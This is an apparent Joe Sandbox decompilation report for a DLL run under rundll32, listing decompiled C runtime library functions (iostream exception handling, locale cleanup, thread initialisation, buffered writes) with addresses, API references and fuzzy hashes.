Instruction Fuzzy Hash: 0C31E4759002559FEB11CF94CC92AEEB3B4FB043A4F250669EC05A7295DB31BE41CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 10002650, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E10002650(intOrPtr* __ecx) {
				intOrPtr _v8;
				char _v16;
				intOrPtr _v20;
				char _v40;
				char _v60;
				char _v80;
				void* __ebx;
				signed int _t35;
				signed int _t39;
				signed int _t43;
				void* _t54;
				signed int _t60;
				void* _t61;
				signed char _t63;
				signed int _t74;

				_push(0xffffffff);
				_push(E1001BDE0);
				_push( *[fs:0x0]);
				_push(_t54);
				_t35 =  *0x10026250; // 0x93b758c1
				_push(_t35 ^ _t74);
				 *[fs:0x0] =  &_v16;
				_v20 = _t74 - 0x40;
				_v8 = 0;
				_t39 =  *( *__ecx + 4);
				if( *((intOrPtr*)(_t39 + __ecx + 0xc)) != 0 || ( *(_t39 + __ecx + 0x14) & 0x00000002) == 0) {
					L11:
					 *[fs:0x0] = _v16;
					return _t39;
				} else {
					_t39 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t39 + __ecx + 0x38)))) + 0x34))();
					if(_t39 != 0xffffffff) {
						goto L11;
					} else {
						_t60 =  *( *__ecx + 4);
						_t61 = _t60 + __ecx;
						_t43 =  *(_t60 + __ecx + 0xc) | 0x00000004;
						if( *((intOrPtr*)(_t61 + 0x38)) == 0) {
							_t43 = _t43 | 0x00000004;
						}
						_t39 = _t43 & 0x00000017;
						 *(_t61 + 0xc) = _t39;
						_t63 =  *(_t61 + 0x10) & _t39;
						if(_t63 == 0) {
							goto L11;
						} else {
							if((_t63 & 0x00000004) != 0) {
								_t63 =  &_v40;
								E100020F0(_t54, _t63, 1, 0x10026008, "ios_base::badbit set");
								_v40 = 0x1001d34c;
								E10007F53( &_v40, 0x100245ac);
							}
							if((_t63 & 0x00000002) != 0) {
								E100020F0(_t54,  &_v60, 1, 0x10026008, "ios_base::failbit set");
								_v60 = 0x1001d34c;
								E10007F53( &_v60, 0x100245ac);
							}
							E100020F0(_t54,  &_v80, 1, 0x10026008, "ios_base::eofbit set");
							_v80 = 0x1001d34c;
							E10007F53( &_v80, 0x100245ac);
							return 0x10002764;
						}
					}
				}
			}

0x10002653
0x10002655
0x10002660
0x10002664
0x10002667
0x1000266e
0x10002672
0x10002678
0x1000267f
0x10002686
0x1000268e
0x10002764
0x10002767
0x10002775
0x1000269f
0x100026a5
0x100026ab
0x00000000
0x100026b1
0x100026b3
0x100026ba
0x100026bc
0x100026c3
0x100026c5
0x100026c5
0x100026c8
0x100026cb
0x100026d1
0x100026d3
0x00000000
0x100026d9
0x100026dc
0x100026ea
0x100026ed
0x100026fa
0x10002702
0x10002702
0x1000270a
0x1000271b
0x10002728
0x10002730
0x10002730
0x10002744
0x10002751
0x10002759
0x10002763
0x10002763
0x100026d3
0x100026ab

APIs

__CxxThrowException@8.LIBCMT ref: 10002702
__CxxThrowException@8.LIBCMT ref: 10002730
__CxxThrowException@8.LIBCMT ref: 10002759

Strings

ios_base::failbit set, xrefs: 1000270C
ios_base::badbit set, xrefs: 100026DE
ios_base::eofbit set, xrefs: 10002735

Memory Dump Source

Source File: 00000007.00000002.2144561604.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2144552179.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144633674.000000001001D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144648856.0000000010026000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2144655977.000000001002A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: 83245adabd4db579cd52a3621752b59676b64cb6a235a15ff18bb91f653b0278
Instruction ID: 0062e7df220c237a3966d45eeada069072e5fecea7ee5e29b51fb5b49809abd2
Opcode Fuzzy Hash: 83245adabd4db579cd52a3621752b59676b64cb6a235a15ff18bb91f653b0278
Instruction Fuzzy Hash: 2B31F134900A04AFEB24DF54DD85F99BBF4FF04398F904169F61AAB682CB75EA44CA40

Uniqueness

Uniqueness Score: -1.00%

Function 10001B41, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10001B41(void* __ebx) {
				void* _t31;
				signed int _t38;
				signed int _t39;
				void* _t49;
				intOrPtr* _t51;
				intOrPtr* _t52;
				signed char _t57;
				void* _t61;
				signed int _t64;
				intOrPtr* _t65;
				void* _t67;

				_t49 = __ebx;
				_t64 =  *(_t67 - 0x1c);
				_t51 =  *((intOrPtr*)(_t67 + 8));
				 *((intOrPtr*)(_t67 - 4)) = 1;
				_t61 =  *((intOrPtr*)( *_t51 + 4)) + _t51;
				if(_t64 != 0) {
					_t38 =  *(_t61 + 0xc) | _t64;
					if( *((intOrPtr*)(_t61 + 0x38)) == 0) {
						_t38 = _t38 | 0x00000004;
					}
					_t39 = _t38 & 0x00000017;
					 *(_t61 + 0xc) = _t39;
					_t57 =  *(_t61 + 0x10) & _t39;
					if(_t57 != 0) {
						if((_t57 & 0x00000004) != 0) {
							_t57 = _t67 - 0x38;
							E100020F0(_t49, _t57, 1, 0x10026008, "ios_base::badbit set");
							 *(_t67 - 0x38) = 0x1001d34c;
							E10007F53(_t67 - 0x38, 0x100245ac);
						}
						_t75 = _t57 & 0x00000002;
						if((_t57 & 0x00000002) != 0) {
							E100020F0(_t49, _t67 - 0x4c, 1, 0x10026008, "ios_base::failbit set");
							 *((intOrPtr*)(_t67 - 0x4c)) = 0x1001d34c;
							E10007F53(_t67 - 0x4c, 0x100245ac);
						}
						E100020F0(_t49, _t67 - 0x60, 1, 0x10026008, "ios_base::eofbit set");
						 *((intOrPtr*)(_t67 - 0x60)) = 0x1001d34c;
						E10007F53(_t67 - 0x60, 0x100245ac);
					}
				}
				 *((intOrPtr*)(_t67 - 4)) = 0xffffffff;
				_t31 = L10006007(_t75);
				_t65 =  *((intOrPtr*)(_t67 - 0x24));
				if(_t31 == 0) {
					E10002650(_t65);
				}
				_t52 =  *((intOrPtr*)( *((intOrPtr*)( *_t65 + 4)) + _t65 + 0x38));
				if(_t52 != 0) {
					 *((intOrPtr*)( *_t52 + 8))();
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t67 - 0xc));
				return  *((intOrPtr*)(_t67 + 8));
			}

0x10001b41
0x10001b41
0x10001b44
0x10001b47
0x10001b53
0x10001b57
0x10001b60
0x10001b66
0x10001b68
0x10001b68
0x10001b6e
0x10001b71
0x10001b74
0x10001b76
0x10001b7f
0x10001b8d
0x10001b90
0x10001b9d
0x10001ba5
0x10001ba5
0x10001baa
0x10001bad
0x10001bbe
0x10001bcb
0x10001bd3
0x10001bd3
0x10001be7
0x10001bf4
0x10001bfc
0x10001bfc
0x10001b76
0x10001c01
0x10001c08
0x10001c0d
0x10001c12
0x10001c16
0x10001c16
0x10001c20
0x10001c26
0x10001c2a
0x10001c2a
0x10001c33
0x10001c41

APIs

__CxxThrowException@8.LIBCMT ref: 10001BA5
__CxxThrowException@8.LIBCMT ref: 10001BD3
__CxxThrowException@8.LIBCMT ref: 10001BFC

Strings

ios_base::failbit set, xrefs: 10001BAF
ios_base::badbit set, xrefs: 10001B81
ios_base::eofbit set, xrefs: 10001BD8

Memory Dump Source

Source File: 00000007.00000002.2144561604.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2144552179.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144633674.000000001001D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144648856.0000000010026000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2144655977.000000001002A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: 966dc6c5f863c677303824590b7025ceacc748f9cbdc2c779ab4186ec999cee1
Instruction ID: 4fa9466e24ecea0817e9ef1d30bac53269f78c7c1b0fabf20e7f48e9d4b18cf9
Opcode Fuzzy Hash: 966dc6c5f863c677303824590b7025ceacc748f9cbdc2c779ab4186ec999cee1
Instruction Fuzzy Hash: 3E217C34A40A09ABEB04EF50D881FDDB7B1FF04394F408159E9166B646DB35E980CB80

Uniqueness

Uniqueness Score: -1.00%

Function 10002EA6, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10002EA6(void* __ebx) {
				signed int _t37;
				signed int _t38;
				void* _t48;
				void* _t51;
				intOrPtr* _t52;
				signed char _t57;
				signed int _t60;
				intOrPtr* _t62;
				void* _t64;

				_t48 = __ebx;
				_t62 =  *((intOrPtr*)(_t64 - 0x14));
				_t60 =  *(_t64 - 0x18);
				 *((intOrPtr*)(_t64 - 4)) = 1;
				_t51 =  *((intOrPtr*)( *_t62 + 4)) + _t62;
				if(_t60 != 0) {
					_t37 =  *(_t51 + 0xc) | _t60;
					if( *((intOrPtr*)(_t51 + 0x38)) == 0) {
						_t37 = _t37 | 0x00000004;
					}
					_t38 = _t37 & 0x00000017;
					 *(_t51 + 0xc) = _t38;
					_t57 =  *(_t51 + 0x10) & _t38;
					if(_t57 != 0) {
						if((_t57 & 0x00000004) != 0) {
							_t57 = _t64 - 0x34;
							E100020F0(_t48, _t57, 1, 0x10026008, "ios_base::badbit set");
							 *(_t64 - 0x34) = 0x1001d34c;
							E10007F53(_t64 - 0x34, 0x100245ac);
						}
						_t72 = _t57 & 0x00000002;
						if((_t57 & 0x00000002) != 0) {
							E100020F0(_t48, _t64 - 0x48, 1, 0x10026008, "ios_base::failbit set");
							 *((intOrPtr*)(_t64 - 0x48)) = 0x1001d34c;
							E10007F53(_t64 - 0x48, 0x100245ac);
						}
						E100020F0(_t48, _t64 - 0x5c, 1, 0x10026008, "ios_base::eofbit set");
						 *((intOrPtr*)(_t64 - 0x5c)) = 0x1001d34c;
						E10007F53(_t64 - 0x5c, 0x100245ac);
					}
				}
				 *((intOrPtr*)(_t64 - 4)) = 0xffffffff;
				if(L10006007(_t72) == 0) {
					E10002650(_t62);
				}
				_t52 =  *((intOrPtr*)( *((intOrPtr*)( *_t62 + 4)) + _t62 + 0x38));
				if(_t52 != 0) {
					 *((intOrPtr*)( *_t52 + 8))();
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t64 - 0xc));
				return _t62;
			}

0x10002ea6
0x10002ea6
0x10002ea9
0x10002eac
0x10002eb8
0x10002ebc
0x10002ec5
0x10002ecb
0x10002ecd
0x10002ecd
0x10002ed0
0x10002ed3
0x10002ed9
0x10002edb
0x10002ee4
0x10002ef2
0x10002ef5
0x10002f02
0x10002f0a
0x10002f0a
0x10002f0f
0x10002f12
0x10002f23
0x10002f30
0x10002f38
0x10002f38
0x10002f4c
0x10002f59
0x10002f61
0x10002f61
0x10002edb
0x10002f66
0x10002f74
0x10002f78
0x10002f78
0x10002f82
0x10002f88
0x10002f8c
0x10002f8c
0x10002f94
0x10002fa2

APIs

__CxxThrowException@8.LIBCMT ref: 10002F0A
__CxxThrowException@8.LIBCMT ref: 10002F38
__CxxThrowException@8.LIBCMT ref: 10002F61

Strings

ios_base::failbit set, xrefs: 10002F14
ios_base::badbit set, xrefs: 10002EE6
ios_base::eofbit set, xrefs: 10002F3D

Memory Dump Source

Source File: 00000007.00000002.2144561604.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2144552179.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144633674.000000001001D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144648856.0000000010026000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2144655977.000000001002A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: 7303cbaa42056cdbce10178bce346b89c1e92fff2439c6f8b3d8c015a8d528cf
Instruction ID: 7c27a8cbb63f5e2596d97cfcd9f7bd2b6b5ade9b9dc534319b1233f4824ef627
Opcode Fuzzy Hash: 7303cbaa42056cdbce10178bce346b89c1e92fff2439c6f8b3d8c015a8d528cf
Instruction Fuzzy Hash: 09219074A00605AFEB10EF94DD41BADB7F1FF443D4F544029E615AB24ACB76EA46CB40

Uniqueness

Uniqueness Score: -1.00%

Function 10002950, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 50%

			E10002950(void* __ebx, void* __ecx, signed int _a4, char _a8) {
				char _v24;
				intOrPtr _v40;
				signed int _t17;
				void* _t26;
				signed char _t29;

				_t26 = __ebx;
				_t17 = _a4 & 0x00000017;
				 *(__ecx + 0xc) = _t17;
				_t29 =  *(__ecx + 0x10) & _t17;
				if(_t29 == 0) {
					return _t17;
				} else {
					if(_a8 != 0) {
						E10007F53(0, 0);
						goto L7;
					} else {
						if((_t29 & 0x00000004) != 0) {
							L7:
							_t30 =  &_v24;
							E100020F0(_t26,  &_v24, 1, 0x10026008, "ios_base::badbit set");
							_v24 = 0x1001d34c;
							E10007F53( &_v24, 0x100245ac);
							goto L8;
						} else {
							_t30 =  &_v24;
							if((_t29 & 0x00000002) != 0) {
								L8:
								_push("ios_base::failbit set");
							} else {
								_push("ios_base::eofbit set");
							}
						}
					}
					_push(0x10026008);
					_push(1);
					E100020F0(_t26, _t30);
					_v24 = 0x1001d34c;
					E10007F53( &_v24, 0x100245ac);
					asm("int3");
					asm("int3");
					return _v40;
				}
			}

0x10002950
0x10002959
0x1000295c
0x10002962
0x10002964
0x10002983
0x10002966
0x1000296a
0x1000298a
0x00000000
0x1000296c
0x1000296f
0x1000298f
0x1000299b
0x1000299e
0x100029ab
0x100029b3
0x00000000
0x10002971
0x10002974
0x10002977
0x100029b8
0x100029b8
0x10002979
0x10002979
0x10002979
0x10002977
0x1000296f
0x100029bd
0x100029c2
0x100029c4
0x100029d1
0x100029d9
0x100029de
0x100029df
0x100029e7
0x100029e7

APIs

__CxxThrowException@8.LIBCMT ref: 1000298A
__CxxThrowException@8.LIBCMT ref: 100029B3
__CxxThrowException@8.LIBCMT ref: 100029D9

Strings

ios_base::failbit set, xrefs: 100029B8
ios_base::badbit set, xrefs: 1000298F
ios_base::eofbit set, xrefs: 10002979

Memory Dump Source

Source File: 00000007.00000002.2144561604.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2144552179.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144633674.000000001001D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144648856.0000000010026000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2144655977.000000001002A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: e426471e0e1779cb50b3471ff4dcef423e1ffda8f26285a8b424b4ac998f351c
Instruction ID: e744d2ced3b4d097ad92c5eaf991159488284f31b658b1be44d195940dd33ec7
Opcode Fuzzy Hash: e426471e0e1779cb50b3471ff4dcef423e1ffda8f26285a8b424b4ac998f351c
Instruction Fuzzy Hash: D301F57084064A2AEB10FA94DD02FEE77E4EB102C0F504015FB087A147DB75BB44C6A3

Uniqueness

Uniqueness Score: -1.00%

Function 100021D0, Relevance: 10.6, APIs: 7, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E100021D0(signed int* __ecx, void* __esi) {
				signed int _t20;
				signed int* _t32;
				signed int* _t36;
				void* _t38;
				void* _t39;

				_t36 = __ecx;
				E100064D8(__ecx);
				_t14 = _t36[0xb];
				_t39 = _t38 + 4;
				if(_t36[0xb] != 0) {
					E10008AD3(_t14);
					_t39 = _t39 + 4;
				}
				_t36[0xb] = 0;
				_t15 = _t36[9];
				if(_t36[9] != 0) {
					E10008AD3(_t15);
					_t39 = _t39 + 4;
				}
				_t36[9] = 0;
				_t16 = _t36[7];
				if(_t36[7] != 0) {
					E10008AD3(_t16);
					_t39 = _t39 + 4;
				}
				_t36[7] = 0;
				_t17 = _t36[5];
				if(_t36[5] != 0) {
					E10008AD3(_t17);
					_t39 = _t39 + 4;
				}
				_t36[5] = 0;
				_t18 = _t36[3];
				if(_t36[3] != 0) {
					E10008AD3(_t18);
					_t39 = _t39 + 4;
				}
				_t36[3] = 0;
				_t19 = _t36[1];
				if(_t36[1] != 0) {
					E10008AD3(_t19);
				}
				_t36[1] = 0;
				_t32 = _t36;
				_t20 =  *_t32;
				if(_t20 != 0) {
					if(_t20 < 4) {
						return E100075E8(0x10027ad8 + _t20 * 0x18, 0x10027ad8 + _t20 * 0x18);
					}
					return _t20;
				} else {
					return E10009287(0xc);
				}
			}

0x100021d1
0x100021d4
0x100021d9
0x100021dc
0x100021e1
0x100021e4
0x100021e9
0x100021e9
0x100021ec
0x100021f3
0x100021f8
0x100021fb
0x10002200
0x10002200
0x10002203
0x1000220a
0x1000220f
0x10002212
0x10002217
0x10002217
0x1000221a
0x10002221
0x10002226
0x10002229
0x1000222e
0x1000222e
0x10002231
0x10002238
0x1000223d
0x10002240
0x10002245
0x10002245
0x10002248
0x1000224f
0x10002254
0x10002257
0x1000225c
0x1000225f
0x10002266
0x10005fe3
0x10005fe7
0x10005ff5
0x00000000
0x10006005
0x10006006
0x10005fe9
0x10005ff1
0x10005ff1

APIs

std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 100021D4

Part of subcall function 100064D8: _setlocale.LIBCMT ref: 100064F1

_free.LIBCMT ref: 100021E4

Part of subcall function 10008AD3: HeapFree.KERNEL32(00000000,00000000), ref: 10008AE7
Part of subcall function 10008AD3: GetLastError.KERNEL32(00000000,?,1000F3A8,00000000,00000001,00000000,10003239,?,?,10008BF2,10005EC2,?), ref: 10008AF9

_free.LIBCMT ref: 100021FB
_free.LIBCMT ref: 10002212
_free.LIBCMT ref: 10002229
_free.LIBCMT ref: 10002240
_free.LIBCMT ref: 10002257

Memory Dump Source

Source File: 00000007.00000002.2144561604.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2144552179.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144633674.000000001001D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144648856.0000000010026000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2144655977.000000001002A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
String ID:
API String ID: 3515823920-0
Opcode ID: 5cc34c2ce0f383fa9aab787888793b52908eb045ddf8d36ce83d06fdfe399cc3
Instruction ID: 88cbe45e1157a1f6a32a9a44a2b714eb5faad33f92abd09d5126fe61a2d12225
Opcode Fuzzy Hash: 5cc34c2ce0f383fa9aab787888793b52908eb045ddf8d36ce83d06fdfe399cc3
Instruction Fuzzy Hash: 9101EDF0B007005BFE20DE659805B1776D8EF116D0F004929E88BD7B49E675F6188BA3

Uniqueness

Uniqueness Score: -1.00%

Function 1000F46A, Relevance: 10.5, APIs: 7, Instructions: 45
threadCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 91%

			E1000F46A(void* __ebx, void* __edx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t3;
				intOrPtr _t6;
				long _t14;
				long* _t28;

				E1000E17D(_t3);
				if(E1000924E() != 0) {
					_t6 = E1000B950(E1000F1C5);
					 *0x1002693c = _t6;
					__eflags = _t6 - 0xffffffff;
					if(_t6 == 0xffffffff) {
						goto L1;
					} else {
						_t28 = E1000A93F(1, 0x3bc);
						__eflags = _t28;
						if(_t28 == 0) {
							L6:
							E1000F4E0();
							__eflags = 0;
							return 0;
						} else {
							__eflags = E1000B9AC( *0x1002693c, _t28);
							if(__eflags == 0) {
								goto L6;
							} else {
								_push(0);
								_push(_t28);
								E1000F3B7(__ebx, __edx, __edi, _t28, __eflags);
								_t14 = GetCurrentThreadId();
								_t28[1] = _t28[1] | 0xffffffff;
								 *_t28 = _t14;
								__eflags = 1;
								return 1;
							}
						}
					}
				} else {
					L1:
					E1000F4E0();
					return 0;
				}
			}

0x1000f46a
0x1000f476
0x1000f485
0x1000f48a
0x1000f490
0x1000f493
0x00000000
0x1000f495
0x1000f4a2
0x1000f4a6
0x1000f4a8
0x1000f4d7
0x1000f4d7
0x1000f4dc
0x1000f4df
0x1000f4aa
0x1000f4b8
0x1000f4ba
0x00000000
0x1000f4bc
0x1000f4bc
0x1000f4be
0x1000f4bf
0x1000f4c6
0x1000f4cc
0x1000f4d0
0x1000f4d4
0x1000f4d6
0x1000f4d6
0x1000f4ba
0x1000f4a8
0x1000f478
0x1000f478
0x1000f478
0x1000f47f
0x1000f47f

APIs

__init_pointers.LIBCMT ref: 1000F46A

Part of subcall function 1000E17D: EncodePointer.KERNEL32(00000000,00000001,1000F46F,10008D2F,10024880,00000008,10008EF5,?,00000001,?,100248A0,0000000C,10008E94,?,00000001,?), ref: 1000E180
Part of subcall function 1000E17D: __initp_misc_winsig.LIBCMT ref: 1000E19B

__mtinitlocks.LIBCMT ref: 1000F46F
__mtterm.LIBCMT ref: 1000F478
__calloc_crt.LIBCMT ref: 1000F49D
__initptd.LIBCMT ref: 1000F4BF
GetCurrentThreadId.KERNEL32(10008D2F,10024880,00000008,10008EF5,?,00000001,?,100248A0,0000000C,10008E94,?,00000001,?), ref: 1000F4C6

Memory Dump Source

Source File: 00000007.00000002.2144561604.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2144552179.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144633674.000000001001D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144648856.0000000010026000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2144655977.000000001002A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: CurrentEncodePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm
String ID:
API String ID: 1469070506-0
Opcode ID: f5534181f0a404a48481a82f14db09bb6c1945a144cc448554b478c0e7ceb303
Instruction ID: 6cb6f10a0599b44026ef747bc0de809849cd31e86474444103bf7f577915bb32
Opcode Fuzzy Hash: f5534181f0a404a48481a82f14db09bb6c1945a144cc448554b478c0e7ceb303
Instruction Fuzzy Hash: B0F09036559B2259F224FB747C036BB26D4DF016F0B21461EFDA0D48DDFF21A8826190

Uniqueness

Uniqueness Score: -1.00%

Function 1000B404, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 136
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 95%

			E1000B404(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t49;
				signed int _t50;
				void* _t57;
				signed int _t59;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t65;
				signed int _t70;
				signed int _t71;
				signed int _t73;
				signed int _t74;
				signed int _t79;
				signed int _t87;
				signed int _t92;
				intOrPtr* _t96;
				void* _t97;

				_push(_t72);
				_t73 = _a8;
				if(_t73 == 0) {
					L4:
					_t50 = 0;
					L5:
					return _t50;
				}
				_t70 = _a12;
				if(_t70 == 0) {
					goto L4;
				}
				_t96 = _a16;
				_t100 = _t96;
				if(_t96 != 0) {
					__eflags = _a4;
					if(__eflags == 0) {
						goto L3;
					}
					__eflags = _t70 - (_t49 | 0xffffffff) / _t73;
					if(__eflags > 0) {
						goto L3;
					}
					_t92 = _t73 * _t70;
					__eflags =  *(_t96 + 0xc) & 0x0000010c;
					_t71 = _t92;
					if(( *(_t96 + 0xc) & 0x0000010c) == 0) {
						_t74 = 0x1000;
					} else {
						_t74 =  *(_t96 + 0x18);
					}
					_v8 = _t74;
					__eflags = _t92;
					if(_t92 == 0) {
						L34:
						_t50 = _a12;
						goto L5;
					} else {
						do {
							_t84 =  *(_t96 + 0xc) & 0x00000108;
							__eflags = _t84;
							if(_t84 == 0) {
								L18:
								__eflags = _t71 - _t74;
								if(_t71 < _t74) {
									_t57 = E100143B4( *_a4, _t96);
									__eflags = _t57 - 0xffffffff;
									if(_t57 == 0xffffffff) {
										L36:
										_t46 =  &_a8; // 0x20
										_t50 = (_t92 - _t71) /  *_t46;
										goto L5;
									}
									_a4 = _a4 + 1;
									_t71 = _t71 - 1;
									_t74 =  *(_t96 + 0x18);
									_v8 = _t74;
									__eflags = _t74;
									if(_t74 <= 0) {
										_t74 = 1;
										__eflags = 1;
										_v8 = 1;
									}
									goto L33;
								}
								__eflags = _t84;
								if(_t84 == 0) {
									L22:
									_t59 = _t71;
									__eflags = _t74;
									if(_t74 == 0) {
										_v12 = _t71;
									} else {
										_t84 = _t59 % _t74;
										_t59 = _t71 - _t59 % _t74;
										_v12 = _t59;
									}
									_push(_t59);
									_push(_a4);
									_push(E1001323D(_t96));
									_t61 = E100134EF(_t71, _t84, _t92, _t96, __eflags);
									_t97 = _t97 + 0xc;
									__eflags = _t61 - 0xffffffff;
									if(_t61 == 0xffffffff) {
										L35:
										_t43 = _t96 + 0xc;
										 *_t43 =  *(_t96 + 0xc) | 0x00000020;
										__eflags =  *_t43;
										goto L36;
									} else {
										_t79 = _v12;
										_t87 = _t79;
										__eflags = _t61 - _t79;
										if(_t61 <= _t79) {
											_t87 = _t61;
										}
										_a4 = _a4 + _t87;
										_t71 = _t71 - _t87;
										__eflags = _t61 - _t79;
										if(_t61 < _t79) {
											goto L35;
										} else {
											L29:
											_t74 = _v8;
											goto L33;
										}
									}
								}
								_t62 = E1000AE9B(_t84, _t96);
								__eflags = _t62;
								if(_t62 != 0) {
									goto L36;
								}
								_t74 = _v8;
								goto L22;
							}
							_t63 =  *(_t96 + 4);
							_v12 = _t63;
							__eflags = _t63;
							if(__eflags == 0) {
								goto L18;
							}
							if(__eflags < 0) {
								goto L35;
							}
							__eflags = _t71 - _t63;
							if(_t71 < _t63) {
								_t63 = _t71;
								_v12 = _t71;
							}
							E100083B0( *_t96, _a4, _t63);
							_t65 = _v12;
							_t97 = _t97 + 0xc;
							 *(_t96 + 4) =  *(_t96 + 4) - _t65;
							_t71 = _t71 - _t65;
							 *_t96 =  *_t96 + _t65;
							_a4 = _a4 + _t65;
							goto L29;
							L33:
							__eflags = _t71;
						} while (_t71 != 0);
						goto L34;
					}
				}
				L3:
				 *((intOrPtr*)(E1000BE7A(_t100))) = 0x16;
				E1000E84A();
				goto L4;
			}

0x1000b408
0x1000b409
0x1000b411
0x1000b431
0x1000b431
0x1000b433
0x1000b439
0x1000b439
0x1000b413
0x1000b418
0x00000000
0x00000000
0x1000b41a
0x1000b41d
0x1000b41f
0x1000b43a
0x1000b43e
0x00000000
0x00000000
0x1000b447
0x1000b449
0x00000000
0x00000000
0x1000b44d
0x1000b450
0x1000b457
0x1000b459
0x1000b460
0x1000b45b
0x1000b45b
0x1000b45b
0x1000b465
0x1000b468
0x1000b46a
0x1000b543
0x1000b543
0x00000000
0x1000b470
0x1000b470
0x1000b473
0x1000b473
0x1000b479
0x1000b4b1
0x1000b4b1
0x1000b4b3
0x1000b51b
0x1000b522
0x1000b525
0x1000b54f
0x1000b555
0x1000b555
0x00000000
0x1000b555
0x1000b527
0x1000b52a
0x1000b52b
0x1000b52e
0x1000b531
0x1000b533
0x1000b537
0x1000b537
0x1000b538
0x1000b538
0x00000000
0x1000b533
0x1000b4b5
0x1000b4b7
0x1000b4cb
0x1000b4cb
0x1000b4cd
0x1000b4cf
0x1000b4de
0x1000b4d1
0x1000b4d3
0x1000b4d7
0x1000b4d9
0x1000b4d9
0x1000b4e1
0x1000b4e2
0x1000b4ec
0x1000b4ed
0x1000b4f2
0x1000b4f5
0x1000b4f8
0x1000b54b
0x1000b54b
0x1000b54b
0x1000b54b
0x00000000
0x1000b4fa
0x1000b4fa
0x1000b4fd
0x1000b4ff
0x1000b501
0x1000b503
0x1000b503
0x1000b505
0x1000b508
0x1000b50a
0x1000b50c
0x00000000
0x1000b50e
0x1000b50e
0x1000b50e
0x00000000
0x1000b50e
0x1000b50c
0x1000b4f8
0x1000b4ba
0x1000b4c0
0x1000b4c2
0x00000000
0x00000000
0x1000b4c8
0x00000000
0x1000b4c8
0x1000b47b
0x1000b47e
0x1000b481
0x1000b483
0x00000000
0x00000000
0x1000b485
0x00000000
0x00000000
0x1000b48b
0x1000b48d
0x1000b48f
0x1000b491
0x1000b491
0x1000b49a
0x1000b49f
0x1000b4a2
0x1000b4a5
0x1000b4a8
0x1000b4aa
0x1000b4ac
0x00000000
0x1000b53b
0x1000b53b
0x1000b53b
0x00000000
0x1000b470
0x1000b46a
0x1000b421
0x1000b426
0x1000b42c
0x00000000

APIs

_memmove.LIBCMT ref: 1000B49A
